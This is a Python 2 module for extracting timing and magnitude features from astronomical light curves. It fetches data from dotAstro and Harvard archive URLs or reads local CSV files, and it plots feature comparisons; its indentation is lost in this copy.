#!/usr/bin/python
# filename: lc_tools.py
import re
import urllib2
try:
from bs4 import BeautifulSoup
except:
BeautifulSoup = False
import numpy as np
try:
from matplotlib import pyplot as plt
except:
pass
import scipy.stats as stats
import pickle as p
#from matplotlib.backends.backend_pdf import PdfPages
import heapq
#import pyPdf
#import lcs_db
import os
import sys
import cfg
'''Scalars to use:
ra,
dec,
avg_mag,
n_epochs,
avg_err,
med_err,
std_err,
start,
end,
total_time,
avgt,
cads_std,
cads_avg,
cads_med,
cad_probs_1, ..., cad_probs_10000000, # 17 total incl. 1 & 10000000
med_double_to_single_step,
avg_double_to_single_step,
std_double_to_single_step,
all_times_hist_peak_val,
all_times_hist_peak_bin,
all_times_nhist_numpeaks,
all_times_nhist_peak_val,
all_times_nhist_peak_1_to_2, 1_to_3, 2_to_3, 1_to_4, 2_to_4, 3_to_4, # (6 total)
all_times_nhist_peak1_bin, peak2_bin, peak3_bin, peak4_bin # 4 total
'''
class lightCurve:
def __init__(self,epochs,mags,errs=[],ra='none',dec='none',source_id='none',time_unit='day',classname='unknown',band='unknown',features_to_use=[]):
''' Extracts the following features (and all are lightCurve obj attrs):
epochs: array of times of all observations,
mags: array of magnitudes of observations,
avg_mag: average magnitude,
errs: array of errors or observations,
n_epochs: the number of epochs,
avg_err: average of the errors,
med_err: median of the errors,
std_err: standard deviation of the errors,
start: time of first observation,
end: time of last observation,
total_time: end - start
avgt: average time between observations,
cads: array of time between successive observations,
cads_std: standard deviation of cads
cads_avg: average of cads
cads_med: median of cads
cad_probs: dictionary of time value (in minutes) keys and percentile score values for that time,
cad_probs_1, etc: percentile score of cad_probs for 1 minute, etc,
double_to_single_step: array of deltaT_3-1 to deltaT_3-2 ratios,
med_double_to_single_step: median of double_to_single_step,
avg_double_to_single_step: average of double_to_single_step,
std_double_to_single_step: standard deviation of double_to_single_step,
all_times: array of time intervals to all possible later observations from each obs in lc
all_times_hist: histogram of all_times (list)
all_times_bins: bin edges of histogram of all_times (list)
all_times_hist_peak_val: peak value of all_times_hist
all_times_hist_peak_bin: bin number of peak of all_times_hist
all_times_hist_normed: all_times_hist normalized s.t. it sums to one
all_times_bins_normed: all_times_bins normalized s.t. last bin edge equals one
all_times_nhist_numpeaks: number of peaks in all_times_hist_normed
all_times_nhist_peaks: list of up to four biggest peaks of all_times_hist_normed, each being a two-item list: [peak_val, bin_index]
all_times_nhist_peak_1_to_2, etc: ratio of all_times histogram peak_1 to peak_2, etc
all_times_nhist_peak1_bin, etc: bin number of 1st, etc peak of all_times_hist
all_times_nhist_peak_val: peak value of all_times_hist_normed
Additional attrs:
time_unit: string specifying time unit (i.e. 'day')
id: dotAstro source id (string)
classname: string, name of class if part of training set
ra: right ascension (decimal degrees),
dec: declination (decimal degrees),
band: observation band
'''
self.time_unit = time_unit
self.id = str(source_id)
self.classname = classname
self.start = epochs[0]
self.end = epochs[-1]
self.total_time = self.end - self.start
self.epochs = epochs
self.n_epochs = len(epochs)
self.errs = errs
self.mags = mags
self.avg_mag = np.average(mags)
self.ra = ra
self.dec = dec
self.band = band
self.avgt = round((self.total_time)/(float(len(epochs))),3)
self.cads = []
self.double_to_single_step = []
self.all_times = []
if len(errs) > 0:
self.avg_err = np.average(errs)
self.med_err = np.median(errs)
self.std_err = np.std(errs)
else:
self.avg_err = None
self.med_err = None
self.std_err = None
for i in range(len(epochs)):
# all the deltaTs (time to next obs)
try:
self.cads.append(epochs[i+1]-epochs[i])
except IndexError:
pass
# ratio of time to obs after next to time to next obs
try:
self.double_to_single_step.append((epochs[i+2]-epochs[i])/(epochs[i+2]-epochs[i+1]))
except IndexError:
pass
except ZeroDivisionError:
pass
# all possible deltaTs ()
for j in range(1,len(epochs)):
try:
self.all_times.append(epochs[i+j]-epochs[i])
except IndexError:
pass
self.all_times_std = np.std(self.all_times)
self.all_times_med = np.median(self.all_times)
self.all_times_avg = np.average(self.all_times)
hist, bins = np.histogram(self.all_times,bins=50)
nhist, bins = np.histogram(self.all_times,bins=50,normed=True)
self.all_times_hist = hist
self.all_times_bins = bins
self.all_times_hist_peak_val = np.max(hist)
self.all_times_hist_peak_bin = np.where(hist==self.all_times_hist_peak_val)[0][0]
self.all_times_hist_normed = nhist
self.all_times_bins_normed = bins/np.max(self.all_times)
self.all_times_nhist_peak_val = np.max(nhist)
peaks = [] # elements are lists: [peak, index]
for peak in heapq.nlargest(10,nhist):
index = np.where(nhist == peak)[0][0]
try:
if nhist[index-1] < peak and nhist[index+1] < peak:
peaks.append([peak,index])
elif nhist[index-1] == peak:
if nhist[index-2] < peak:
peaks.append([peak,index])
elif nhist[index+1] == peak:
if nhist[index+2] < peak:
peaks.append([peak,index])
except IndexError:
# peak is first or last entry
peaks.append([peak,index])
peaks = sorted(peaks,key=lambda x:x[1])
self.all_times_nhist_peaks = peaks[:4]
self.all_times_nhist_numpeaks = len(peaks)
if len(peaks) > 0:
self.all_times_nhist_peak1_bin = peaks[0][1]
else:
self.all_times_nhist_peak1_bin = None
self.all_times_nhist_peak_1_to_2, self.all_times_nhist_peak_1_to_3, self.all_times_nhist_peak_2_to_3, \
self.all_times_nhist_peak_1_to_4, self.all_times_nhist_peak_2_to_4, \
self.all_times_nhist_peak_3_to_4 = [None,None,None,None,None,None]
self.all_times_nhist_peak4_bin, self.all_times_nhist_peak3_bin, self.all_times_nhist_peak2_bin = [None,None,None]
if len(peaks) >= 2:
self.all_times_nhist_peak_1_to_2 = peaks[0][0]/peaks[1][0]
self.all_times_nhist_peak2_bin = peaks[1][1]
if len(peaks) >= 3:
self.all_times_nhist_peak_2_to_3 = peaks[1][0]/peaks[2][0]
self.all_times_nhist_peak_1_to_3 = peaks[0][0]/peaks[2][0]
self.all_times_nhist_peak3_bin = peaks[2][1]
if len(peaks) >= 4:
self.all_times_nhist_peak_1_to_4 = peaks[0][0]/peaks[3][0]
self.all_times_nhist_peak_2_to_4 = peaks[1][0]/peaks[3][0]
self.all_times_nhist_peak_3_to_4 = peaks[2][0]/peaks[3][0]
self.all_times_nhist_peak4_bin = peaks[3][1]
self.avg_double_to_single_step = np.average(self.double_to_single_step)
self.med_double_to_single_step = np.median(self.double_to_single_step)
self.std_double_to_single_step = np.std(self.double_to_single_step)
self.cads_std = np.std(self.cads)
self.cads_avg = np.average(self.cads)
self.cads_med = np.median(self.cads)
self.cad_probs = {}
for time in [1,10,20,30,40,50,100,500,1000,5000,10000,50000,100000,500000,1000000,5000000,10000000]:
if self.time_unit == 'day':
self.cad_probs[time] = stats.percentileofscore(self.cads,float(time)/(24.0*60.0))/100.0
elif self.time_unit == 'hour':
self.cad_probs[time] = stats.percentileofscore(self.cads,float(time))/100.0
self.cad_probs_1 = self.cad_probs[1]
self.cad_probs_10 = self.cad_probs[10]
self.cad_probs_20 = self.cad_probs[20]
self.cad_probs_30 = self.cad_probs[30]
self.cad_probs_40 = self.cad_probs[40]
self.cad_probs_50 = self.cad_probs[50]
self.cad_probs_100 = self.cad_probs[100]
self.cad_probs_500 = self.cad_probs[500]
self.cad_probs_1000 = self.cad_probs[1000]
self.cad_probs_5000 = self.cad_probs[5000]
self.cad_probs_10000 = self.cad_probs[10000]
self.cad_probs_50000 = self.cad_probs[50000]
self.cad_probs_100000 = self.cad_probs[100000]
self.cad_probs_500000 = self.cad_probs[500000]
self.cad_probs_1000000 = self.cad_probs[1000000]
self.cad_probs_5000000 = self.cad_probs[5000000]
self.cad_probs_10000000 = self.cad_probs[10000000]
def extractScienceFeatures(self):
return
def showInfo(self):
print [self.start,self.end,len(self.epochs),self.avgt]
def showAllInfo(self):
for attr, val in vars(self).items():
print attr, ":", val
def allAttrs(self):
count = 0
for attr, val in vars(self).items():
print attr
count += 1
print count, "attributes total."
def put(self,cursor):
return
def generate_features_dict(self):
features_dict = {}
for attr, val in vars(self).items():
if attr in cfg.features_list:
features_dict[attr] = val
return features_dict
def generate_features_dict(lc_obj):
return lc_obj.generate_features_dict()
def makePdf(sources):
pdf = PdfPages("sample_features.pdf")
classnames = []
classname_dict = {}
x = 2 # number of subplot columns
y = 3 # number of subplot rows
for source in sources:
lc = source.lcs[0]
if lc.classname not in classnames:
classnames.append(lc.classname)
classname_dict[lc.classname] = [lc]
else:
classname_dict[lc.classname].append(lc)
if len(classname_dict[lc.classname]) < 3:
label = lc.classname + "; ID: " + lc.id
# all_times histogram:
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_title(label)
ax.axis('off')
ax1 = fig.add_subplot(321)
ax2 = fig.add_subplot(322)
ax2.axis('off')
ax3 = fig.add_subplot(323)
ax4 = fig.add_subplot(324)
ax4.axis('off')
ax5 = fig.add_subplot(325)
ax6 = fig.add_subplot(326)
ax6.axis('off')
hist, bins, other = ax1.hist(lc.all_times,50,normed=True)
ax1.text(np.max(bins)*0.1,np.max(hist)*0.8,r'Histogram (normed) of all $\Delta$Ts')
ax2.text(0.0,0.9,r'$\bullet$med time to next obs: ' + str(np.round(lc.cads_med,4)))
ax2.text(0.0,0.75,r'$\bullet$avg time to next obs: ' + str(np.round(lc.avgt,4)))
ax2.text(0.0,0.6,r'$\bullet$std dev of time to next obs: ' + str(np.round(lc.cads_std,4)))
ax2.text(0.0,0.45,r'$\bullet$med of all $\Delta$Ts: ' + str(np.round(lc.all_times_med,4)))
ax2.text(0.0,0.3,r'$\bullet$avg of all $\Delta$Ts: ' + str(np.round(lc.all_times_avg,4)))
ax2.text(0.0,0.15,r'$\bullet$std dev of all $\Delta$Ts: ' + str(np.round(lc.all_times_std,4)))
hist, bins, other = ax3.hist(lc.cads,50)
ax3.text(np.max(bins)*0.1,np.max(hist)*0.8,r'Hist of time to next obs')
ax6.text(0.0,0.9,r'$\bullet$Number of epochs: ' + str(lc.n_epochs))
ax6.text(0.0,0.75,r'$\bullet$Time b/w first & last obs (days): ' + str(np.round(lc.total_time,2)))
ax6.text(0.0,0.6,r'$\bullet$Average error in mag: ' + str(np.round(lc.avg_err,4)))
ax6.text(0.0,0.45,r'$\bullet$Median error in mag: ' + str(np.round(lc.med_err,4)))
ax6.text(0.0,0.3,r'$\bullet$Std dev of error: ' + str(np.round(lc.std_err,4)))
ax6.text(0.0,0.15,'')
ax5.scatter(lc.epochs,lc.mags)
ax4.text(0.0,0.9,r'$\bullet$Avg double to single step ratio: ' + str(np.round(lc.avg_double_to_single_step,3)))
ax4.text(0.0,0.75,r'$\bullet$Med double to single step: ' + str(np.round(lc.med_double_to_single_step,3)))
ax4.text(0.0,0.6,r'$\bullet$Std dev of double to single step: ' + str(np.round(lc.std_double_to_single_step,3)))
ax4.text(0.0,0.45,r'$\bullet$1st peak to 2nd peak (in all $\Delta$Ts): ' + str(np.round(lc.all_times_nhist_peak_1_to_2,3)))
ax4.text(0.0,0.3,r'$\bullet$2ndt peak to 3rd peak (in all $\Delta$Ts): ' + str(np.round(lc.all_times_nhist_peak_2_to_3,3)))
ax4.text(0.0,0.15,r'$\bullet$1st peak to 3rd peak (in all $\Delta$Ts): ' + str(np.round(lc.all_times_nhist_peak_1_to_3,3)))
pdf.savefig(fig)
pdf.close()
pdf = PdfPages('feature_plots.pdf')
fig = plt.figure()
ax1 = fig.add_subplot(221)
ax2 = fig.add_subplot(222)
ax3 = fig.add_subplot(223)
ax4 = fig.add_subplot(224)
plt.subplots_adjust(wspace=0.4,hspace=0.4)
classnamenum = 0
colors = ['red','yellow','green','blue','gray','orange','cyan','magenta']
for classname, lcs in classname_dict.items():
classnamenum += 1
print classname, len(lcs), 'light curves.'
attr1 = []
attr2 = []
attr3 = []
attr4 = []
attr5 = []
attr6 = []
attr7 = []
attr8 = []
for lc in lcs:
attr1.append(lc.n_epochs)
attr2.append(lc.avgt)
attr3.append(lc.cads_std)
attr4.append(lc.total_time)
attr5.append(lc.all_times_hist_peak_val)
attr6.append(lc.cad_probs[5000])
attr7.append(lc.all_times_nhist_peak_1_to_3)
attr8.append(lc.all_times_nhist_peak_val)
ax2.scatter(attr1,attr2,color=colors[classnamenum],label=classname)
ax1.scatter(attr3,attr4,color=colors[classnamenum],label=classname)
ax2.set_xlabel('N Epochs')
ax2.set_ylabel('Avg time to next obs')
ax1.set_xlabel('Standard dev. of time to next obs')
ax1.set_ylabel('Time b/w first and last obs')
ax3.scatter(attr5,attr6,color=colors[classnamenum],label=classname)
ax4.scatter(attr7,attr8,color=colors[classnamenum],label=classname)
ax3.set_xlabel(r'All $\Delta$T hist peak val')
ax3.set_ylabel('Prob time to next obs <= 5000 min')
ax4.set_xlabel(r'$\Delta$Ts normed hist peak 1 to peak 3')
ax4.set_ylabel(r'Peak val of all $\Delta$Ts normed hist')
#ax1.legend(bbox_to_anchor=(1.1, 1.1),prop={'size':6})
ax2.legend(bbox_to_anchor=(1.1, 1.1),prop={'size':6})
#ax3.legend(loc='upper right',prop={'size':6})
#ax4.legend(loc='upper right',prop={'size':6})
pdf.savefig(fig)
pdf.close()
return
def generate_lc_snippets(lc):
epochs,mags,errs = [lc.epochs,lc.mags,lc.errs]
lc_snippets = []
n_epochs = len(epochs)
for binsize in [20,40,70,100,150,250,500,1000,10000]:
nbins = 0
if n_epochs > binsize:
bin_edges = np.linspace(0,n_epochs-1,int(round(float(n_epochs)/float(binsize)))+1)
#for chunk in list(chunks(range(n_epochs),binsize)):
bin_indices = range(len(bin_edges)-1)
np.random.shuffle(bin_indices)
for i in bin_indices:
nbins += 1
if int(round(bin_edges[i+1])) - int(round(bin_edges[i])) >= 10 and nbins < 4:
lc_snippets.append(lightCurve(epochs[int(round(bin_edges[i])):int(round(bin_edges[i+1]))],mags[int(round(bin_edges[i])):int(round(bin_edges[i+1]))],errs[int(round(bin_edges[i])):int(round(bin_edges[i+1]))],classname=lc.classname))
return lc_snippets
class Source:
def __init__(self,id,lcs,classname='unknown'):
self.lcs = []
self.lc_snippets = []
self.id = id
self.classname = classname
for lc in lcs:
self.lcs.append(lc)
self.lc_snippets.extend(generate_lc_snippets(lc))
def showInfo(self):
print "dotAstro ID: " + str(self.id) + "Num LCs: " + str(len(self.lcs))
def plotCadHists(self):
n_lcs = len(self.lcs)
if n_lcs > 0:
x = int(np.sqrt(n_lcs))
y = n_lcs/x + int(n_lcs%x > 0)
plotnum = 1
for lc in self.lcs:
plt.subplot(x,y,plotnum)
plt.hist(lc.cads,50,range=(0,np.std(lc.cads)*2.0))
plt.xlabel('Time to next obs.')
plt.ylabel('# Occurrences')
plotnum += 1
plt.show()
return
def put(self, cursor, lc_cursor):
cursor.execute("INSERT INTO sources VALUES(?, ?)",(self.id, self.classname))
for lc in self.lcs:
lc.put(lc_cursor)
def getMultiple(source_ids,classname='unknown'):
'''Returns an array of Source objects corresponding to source IDs in source_ids.
source_ids is either a filename or an array of dotAstro IDs.
'''
if type(source_ids) == str:
f = open(source_ids,'r')
ids = f.read().split()
f.close()
elif type(source_ids) == list:
ids = source_ids
# assuming dotAstro IDs:
sources = []
for id in ids:
lc = getLcInfo(id,classname)
if lc: # getLcInfo returns False if no data found
sources.append(lc)
return sources
def getLcInfo(id,classname='unknown'):
id = str(id)
isError = False
if("http" in id):
url = id
elif id.isdigit():
url = "http://dotastro.org/lightcurves/vosource.php?Source_ID=" + id
try:
lc = urllib2.urlopen(url).read()
if lc.find("<TD>") == -1:
raise urllib2.URLError('No data for specified source ID.')
except (IOError, urllib2.URLError) as error:
print "Could not read specified file.", id, error
isError = True
return False
except Exception as error:
print "Error encountered.", id, error
isError = True
return False
if not isError:
lcs = dotAstroLc(lc,id,classname)
newSource = Source(id,lcs,classname)
#print len(lcs), "light curves processed for source", id
return newSource
return
def dotAstroLc(lc,id,classname):
lcs = []
numlcs = 0
data = lc
soup = BeautifulSoup(data)
try:
ra = float(soup('position2d')[0]('value2')[0]('c1')[0].renderContents())
dec = float(soup('position2d')[0]('value2')[0]('c2')[0].renderContents())
except IndexError:
print 'position2d/value2/c1 or c2 tag not present in light curve file'
ra, dec = [None,None]
time_unit = []
for timeunitfield in soup(ucd="time.epoch"):
time_unit.append(timeunitfield['unit'])
for data_table in soup('tabledata'):
epochs = []
mags = []
errs = []
for row in data_table('tr'):
tds = row("td")
epochs.append(float(tds[0].renderContents()))
mags.append(float(tds[1].renderContents()))
errs.append(float(tds[2].renderContents()))
if len(epochs) > 0:
lcs.append(lightCurve(epochs,mags,errs,ra,dec,id,time_unit[numlcs],classname))
numlcs += 1
return lcs
def getMultipleLocal(filenames,classname='unknown'):
sources = []
for filename in filenames:
sources.append(getLocalLc(filename,classname))
return sources
def csvLc(lcdata,classname='unknown',sep=',',single_obj_only=False):
lcdata = lcdata.split('\n')
epochs = []
mags = []
errs = []
for line in lcdata:
line = line.replace("\n","")
if len(line.split()) > len(line.split(sep)):
sep = ' '
if len(line) > 0:
if line[0] != "#":
if sep.isspace():
els = line.split()
else:
els = line.split(sep)
if len(els) == 3:
epochs.append(float(els[0]))
mags.append(float(els[1]))
errs.append(float(els[2]))
elif len(els) == 2:
epochs.append(float(els[0]))
mags.append(float(els[1]))
else:
print len(els), "elements in row - cvsLc()"
if len(epochs) > 0:
if single_obj_only:
lc = lightCurve(epochs,mags,errs,classname=classname)
else:
lc = [lightCurve(epochs,mags,errs,classname=classname)]
return lc
else:
print 'csvLc() - No data.'
return []
def getLocalLc(filename,classname='unknown',sep=',',single_obj_only=False,ts_data_passed_directly=False,add_errors=False):
if ts_data_passed_directly:
lcdata = filename
for i in range(len(lcdata)):
try:
if len(lcdata[i])==2 and add_errors:
lcdata[i] = lcdata[i] + ["1.0"]
lcdata[i] = ','.join(lcdata[i])
except TypeError:
for j in range(len(lcdata[i])):
lcdata[i][j] = str(lcdata[i][j])
if len(lcdata[i])==2 and add_errors:
lcdata[i] = lcdata[i] + ["1.0"]
lcdata[i] = ','.join(lcdata[i])
else:
f = open(filename, 'r')
lcdata = []
for line in f.readlines():
if line.strip() != "":
if len(line.strip().split(sep)) == 2 and add_errors:
line = line.strip()+sep+"1.0"
lcdata.append(line.strip())
f.close()
lcdata = '\n'.join(lcdata)
if lcdata.find("<Position2D>") > 0 and lcdata.find("xml") > 0:
lcs = dotAstroLc(lcdata,filename,classname)
else:
lcs = csvLc(lcdata,classname,sep,single_obj_only=single_obj_only)
if single_obj_only:
return lcs
else:
#print len(lcs), "light curves processed for", filename
newSource = Source(filename,lcs,classname)
return newSource
def generate_timeseries_features(filename,classname='unknown',sep=',',single_obj_only=True,ts_data_passed_directly=False,add_errors=True):
lc_obj = getLocalLc(filename,classname=classname,sep=sep,single_obj_only=single_obj_only,ts_data_passed_directly=ts_data_passed_directly,add_errors=add_errors)
features_dict = lc_obj.generate_features_dict()
return features_dict
def dotAstro_to_csv(id):
id = str(id)
isError = False
if("http" in id):
url = id
elif id.isdigit():
url = "http://dotastro.org/lightcurves/vosource.php?Source_ID=" + id
else:
print "dotAstro ID not a digit."
try:
lc = urllib2.urlopen(url).read()
if lc.find("<TD>") == -1:
raise urllib2.URLError('No data for specified source ID.')
except (IOError, urllib2.URLError) as error:
print "Could not read specified file.", id, error
isError = True
return False
except Exception as error:
print "Error encountered.", id, error
isError = True
return False
lcs = []
numlcs = 0
lcdata = lc
soup = BeautifulSoup(lcdata)
try:
ra = float(soup('position2d')[0]('value2')[0]('c1')[0].renderContents())
dec = float(soup('position2d')[0]('value2')[0]('c2')[0].renderContents())
except IndexError:
print 'position2d/value2/c1 or c2 tag not present in light curve file'
ra, dec = [None,None]
time_unit = []
for timeunitfield in soup(ucd="time.epoch"):
time_unit.append(timeunitfield['unit'])
for data_table in soup('tabledata'):
csv_str = ""
for row in data_table('tr'):
tds = row("td")
if len(tds) == 3:
csv_str += ','.join([str(tds[0].renderContents()),str(tds[1].renderContents()),str(tds[2].renderContents())]) + '\n'
if len(csv_str) > 0:
lcs.append(csv_str)
numlcs += 1
return lcs
testurl = 'http://timemachine.iic.harvard.edu/search/lcdb/astobject/lightcurve/135278496/download=ascii/pro=cal/'
def parse_harvard_lc(id):
id = str(id)
url = "http://timemachine.iic.harvard.edu/search/lcdb/astobject/lightcurve/ID/download=ascii/pro=cal/".replace("ID",id)
lc = urllib2.urlopen(url).read().split("\n")
lcdata = ""
for line in lc:
if len(line) > 0:
if line[0] != "#":
lcdata += ",".join(line.split()) + "\n"
return [lcdata]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.